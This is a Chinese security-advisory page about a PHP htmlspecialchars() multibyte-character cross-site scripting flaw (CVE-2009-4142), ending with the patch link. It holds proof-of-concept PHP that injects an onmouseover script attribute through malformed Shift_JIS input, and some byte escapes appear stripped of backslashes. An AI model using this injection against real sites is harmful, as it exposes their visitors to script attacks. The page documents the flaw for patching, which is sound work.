Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / PHP htmlspecialcharacters()畸形多字节字符跨站脚本漏洞

发布日期:2009-12-17
更新日期:2009-12-18受影响系统:
PHP PHP 5.2.x
不受影响系统:
PHP PHP 5.2.12
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 37389
CVE(CAN) ID: CVE-2009-4142PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP的htmlspecialchars()函数没有正确地过滤某些多字节字符输入,远程攻击者可以通过提交包含有特殊字符的请求序列执行跨站脚本攻击。<*来源:Moriyoshi (hello@iwamot.com)
 
  链接:http://secunia.com/advisories/37821/
        http://bugs.php.net/bug.php?id=49785
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!// overlong UTF-8 sequence
echo htmlspecialchars("AxC0xAF&",     ENT_QUOTES, "UTF-8");
// invalid Shift_JIS sequence
echo htmlspecialchars("Bx80&",         ENT_QUOTES, "Shift_JIS");
echo htmlspecialchars("Cx81x7f&",     ENT_QUOTES, "Shift_JIS");
// invalid EUC-JP sequence
echo htmlspecialchars("Dx80&",         ENT_QUOTES, "EUC-JP");
echo htmlspecialchars("ExA1xFF&",     ENT_QUOTES, "EUC-JP");
echo htmlspecialchars("Fx8ExFF&",     ENT_QUOTES, "EUC-JP");
echo htmlspecialchars("Gx8FxA1xFF&", ENT_QUOTES, "EUC-JP");
<?php$_GET["a1"] = "xf0";    // xf0 - xfc で可能
$_GET["a2"] = " href=dummy onmouseover=alert(document.title) dummy=dummy";header( "Content-Type:text/html; charset=Shift_JIS" );
?>
<html>
<head><title>Shift_JIS test</title></head>
<body>
<p><a title="<?php echo htmlspecialchars( $_GET["a1"], ENT_QUOTES, "SJIS" ) ?>" href="<?php echo htmlspecialchars( $_GET["a2"], ENT_QUOTES, "SJIS" ) ?>">test</a></p>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.php.net/ChangeLog-5.php#5.2.12Linux Kernel drivers/firewire/ohci.c空指针引用拒绝服务漏洞Ubuntu 9.10环境下缓存区溢出攻击实验相关资讯      漏洞  PHP 
  • PHP代码规范的10个好习惯  (12/05/2015 08:20:04)
  • PHP 性能分析与实验:性能的宏观分  (08/19/2015 19:48:24)
  • 在 Linux 命令行中使用和执行 PHP   (07/30/2015 10:07:32)
  • PHP 性能分析与实验:性能的微观分  (09/13/2015 20:49:27)
  • PHP 和 Node.js 的对决  (08/06/2015 08:51:28)
  • 在 Linux 命令行中使用和执行 PHP   (07/29/2015 13:15:46)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图